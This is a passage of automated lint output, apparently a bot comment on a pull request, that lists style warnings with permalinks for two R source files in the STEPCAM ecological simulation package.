characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:14:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L193) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L195) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:198:19:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L198) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:199:19:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L199) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:19:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L200) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:14:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:18:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:204:17:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L204) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:17:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:206:17:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:24:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:40:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L209) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:211:24:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:40:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L211) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:212:13:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:27:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:13:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:216:14:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:34:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:21:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L222) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:222:22:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:38:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:242:54:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L242) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:245:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L245) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:9:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:246:32:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L246) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L249) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:249:27:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:250:20:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L250) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:251:20:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L251) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:20:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:61:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L262) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:266:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/ABC_SMC.R#L266) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"Can't stop at iteration 1 - please set stop_at_iteration to 2 if you only want to generate from the prior\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/50efb5a801656dc2dee7b9cacca9abeabbc80f6f/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    